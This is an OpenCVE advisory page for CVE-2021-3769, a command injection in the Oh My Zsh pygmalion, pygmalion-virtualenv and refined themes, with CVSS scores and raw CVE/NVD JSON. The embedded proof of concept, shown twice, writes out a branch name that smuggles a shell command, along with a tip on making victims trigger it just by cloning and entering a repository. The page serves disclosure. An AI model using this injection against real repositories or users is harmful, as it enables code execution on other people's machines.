CVE-2021-3769 - OpenCVE

# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme.

No CVSS v4.0

Attack Vector Network

Attack Complexity High

Privileges Required None

Scope Unchanged

Confidentiality Impact High

Integrity Impact High

Availability Impact High

User Interaction Required

No CVSS v3.0

Access Vector Network

Access Complexity Low

Authentication None

Confidentiality Impact Complete

Integrity Impact Complete

Availability Impact Complete

AV:N/AC:L/Au:N/C:C/I:C/A:C

This CVE is not in the KEV list.

Key SSVC decision points have not yet been added.

Vendors	Products
Planetargon	Oh My Zsh

Configuration 1 [-]

cpe:2.3:a:planetargon:oh_my_zsh:*:*:*:*:*:*:*:*

No data.

References

Link	Providers
https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978

History

No history.

MITRE

Status: PUBLISHED

Assigner: @huntrdev

Published: 2021-11-30T09:30:18

Updated: 2024-08-03T17:09:08.686Z

Reserved: 2021-09-05T00:00:00

Link: CVE-2021-3769

Vulnrichment

No data.

NVD

Status : Analyzed

Published: 2021-11-30T10:15:09.000

Modified: 2021-12-01T19:56:31.297

Link: CVE-2021-3769

Redhat

No data.

{"containers": {"cna": {"affected": [{"product": "ohmyzsh/ohmyzsh", "vendor": "ohmyzsh", "versions": [{"lessThan": "b3ba9978", "status": "affected", "version": "unspecified", "versionType": "custom"}]}], "descriptions": [{"lang": "en", "value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme."}], "exploits": [{"lang": "en", "value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `pygmalion`, `pygmalion-virtualenv` or `refined` themes.\n3. Create and `cd` into a new git repository: `git init bad-repo && cd bad-repo`.\n4. Create and switch to a new branch with a name containing either `$(<injected-command>`, <code>\\`\\<injected-command\\>\\`</code> or `${(e):-\"<injected-command>\"}`:\n\n ```sh\n badbranch='feat/bad-branch$(id>/dev/tty)'\n git checkout -b \"$badbranch\"\n ```\n\n In the `pygmalion` theme, the prompt changes changes from the default branch to:\n\n ```console\n user@host:~/exploit-poc|master \u21d2 badbranch='feat/bad-branch$(id>/dev/tty)'; git checkout -b \"$badbranch\"\n Switched to a new branch 'feat/bad-branch$(id>/dev/tty)'\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n user@host:~/exploit-poc|feat/bad-branch \u21d2 \n ```\n\n A similar thing happens in `pygmalion-virtualenv` and `refined` themes.\n\nNOTE: for maximum impact, you can define the malicious branch name as the default branch name in GitHub, so that when a user clones it for the first time and enters the repository, the malicious branch is automatically checked out. That means that the user only needs to clone and enter the repository for the exploit to work.\n"}], "metrics": [{"cvssV3_1": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}}], "problemTypes": [{"descriptions": [{"cweId": "CWE-78", "description": "CWE-78 OS Command Injection", "lang": "en", "type": "CWE"}]}], "providerMetadata": {"dateUpdated": "2021-11-30T09:30:18", "orgId": "c09c270a-b464-47c1-9133-acb35b22c19a", "shortName": "@huntrdev"}, "references": [{"tags": ["x_refsource_MISC"], "url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"}], "title": "OS Command Injection in ohmyzsh/ohmyzsh", "x_legacyV4Record": {"CVE_data_meta": {"ASSIGNER": "security@huntr.dev", "ID": "CVE-2021-3769", "STATE": "PUBLIC", "TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"}, "affects": {"vendor": {"vendor_data": [{"product": {"product_data": [{"product_name": "ohmyzsh/ohmyzsh", "version": {"version_data": [{"version_affected": "<", "version_value": "b3ba9978"}]}}]}, "vendor_name": "ohmyzsh"}]}}, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": {"description_data": [{"lang": "eng", "value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme."}]}, "exploit": [{"lang": "en", "value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `pygmalion`, `pygmalion-virtualenv` or `refined` themes.\n3. Create and `cd` into a new git repository: `git init bad-repo && cd bad-repo`.\n4. Create and switch to a new branch with a name containing either `$(<injected-command>`, <code>\\`\\<injected-command\\>\\`</code> or `${(e):-\"<injected-command>\"}`:\n\n ```sh\n badbranch='feat/bad-branch$(id>/dev/tty)'\n git checkout -b \"$badbranch\"\n ```\n\n In the `pygmalion` theme, the prompt changes changes from the default branch to:\n\n ```console\n user@host:~/exploit-poc|master \u21d2 badbranch='feat/bad-branch$(id>/dev/tty)'; git checkout -b \"$badbranch\"\n Switched to a new branch 'feat/bad-branch$(id>/dev/tty)'\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n user@host:~/exploit-poc|feat/bad-branch \u21d2 \n ```\n\n A similar thing happens in `pygmalion-virtualenv` and `refined` themes.\n\nNOTE: for maximum impact, you can define the malicious branch name as the default branch name in GitHub, so that when a user clones it for the first time and enters the repository, the malicious branch is automatically checked out. That means that the user only needs to clone and enter the repository for the exploit to work.\n"}], "impact": {"cvss": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}}, "problemtype": {"problemtype_data": [{"description": [{"lang": "eng", "value": "CWE-78 OS Command Injection"}]}]}, "references": {"reference_data": [{"name": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978", "refsource": "MISC", "url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"}]}}}, "adp": [{"providerMetadata": {"orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE", "dateUpdated": "2024-08-03T17:09:08.686Z"}, "title": "CVE Program Container", "references": [{"tags": ["x_refsource_MISC", "x_transferred"], "url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"}]}]}, "cveMetadata": {"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a", "assignerShortName": "@huntrdev", "cveId": "CVE-2021-3769", "datePublished": "2021-11-30T09:30:18", "dateReserved": "2021-09-05T00:00:00", "dateUpdated": "2024-08-03T17:09:08.686Z", "state": "PUBLISHED"}, "dataType": "CVE_RECORD", "dataVersion": "5.1"}

{"configurations": [{"nodes": [{"cpeMatch": [{"criteria": "cpe:2.3:a:planetargon:oh_my_zsh:*:*:*:*:*:*:*:*", "matchCriteriaId": "80FD5E81-3E73-4921-925C-E55098EAE4B1", "versionEndExcluding": "2021-11-11", "vulnerable": true}], "negate": false, "operator": "OR"}]}], "cveTags": [], "descriptions": [{"lang": "en", "value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme."}, {"lang": "es", "value": "# Vulnerabilidad en los temas \"pygmalion\", \"pygmalion-virtualenv\" y \"refined\" **Descripci\u00f3n**: estos temas usan \"print -P\" en las cadenas proporcionadas por el usuario para imprimirlas en la terminal. Todos ellos lo hacen sobre la informaci\u00f3n de git, particularmente el nombre de la rama, por lo que si la rama presenta un nombre especialmente dise\u00f1ado la vulnerabilidad puede ser explotada. **Corregido en**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **\u00c1reas afectadas**: - Tema \"pygmalion\". - Tema \"pygmalion-virtualenv\". - Tema \"refined\""}], "id": "CVE-2021-3769", "lastModified": "2021-12-01T19:56:31.297", "metrics": {"cvssMetricV2": [{"acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false}], "cvssMetricV31": [{"cvssData": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary"}, {"cvssData": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.6, "impactScore": 5.9, "source": "security@huntr.dev", "type": "Secondary"}]}, "published": "2021-11-30T10:15:09.000", "references": [{"source": "security@huntr.dev", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"}], "sourceIdentifier": "security@huntr.dev", "vulnStatus": "Analyzed", "weaknesses": [{"description": [{"lang": "en", "value": "CWE-78"}], "source": "security@huntr.dev", "type": "Primary"}]}